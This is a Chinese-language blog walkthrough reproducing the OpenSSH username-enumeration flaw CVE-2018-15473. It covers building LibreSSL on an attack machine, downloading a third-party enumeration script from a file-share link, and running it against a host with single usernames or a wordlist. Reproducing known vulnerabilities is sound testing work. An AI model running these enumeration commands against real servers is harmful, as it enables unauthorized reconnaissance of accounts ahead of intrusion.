CVE-2018-15473漏洞復現

OpenSSH 用戶枚舉漏洞(CVE-2018-15473)

詳細描述

OpenSSH(OpenBSD Secure Shell)是OpenBSD計劃組所維護的一套用于安全訪問遠程計算機的連接工具。該工具是SSH協議的開源實現,支持對所有的傳輸進行加密,可有效阻止竊聽、連接劫持以及其他網絡級的攻擊。

利用環境

描述:OpenSSH 7.7及之前版本中存在用戶枚舉漏洞,該漏洞源于程序會對有效的和無效的用戶身份驗證請求發出不同的響應。攻擊者可通過發送特制的請求利用該漏洞枚舉用戶名稱。
攻擊機:CentOS-6.8、libreSSL-2.7.4、python3

安裝依賴包

需要安裝libreSSL,python3可以加載ssl,無需再次安裝
1、libreSSL-2.7.4安裝

下載地址:https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/
tar -zxvf libreSSL-2.7.4.tar.gz
cd libreSSL-2.7.4
./config –prefix=/usr/local/lib
make
make install
cd /etc/ld.so.conf.d
#新建文件:
vi libressl-2.7.4.conf 
#將libssl庫安裝路徑/usr/local/lib加入文件 libressl-2.7.4.conf
/usr/local/lib
#重新加載庫文件
ldconfig -v  
image.png

2、查看是否安裝成功

openssl version
image.png

漏洞驗證腳本下載

鏈接:https://pan.baidu.com/s/1g83Ln-uHOqTK032UrQevrw   提取碼:2506 

1、安裝腳本依賴包

cd cve-2018-15473-master  
pip3 install -r requirements.txt
chmod u+x ssh-username-enum.py
image.png

2、驗證方法

#單個用戶驗證
python3 ssh-username-enum.py -u 用戶 host
image.png
#多個用戶驗證
python3 ssh-username-enum.py -6 -p 22 -v -w 用戶列表 host
image.png
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
禁止轉載,如需轉載請通過簡信或評論聯系作者。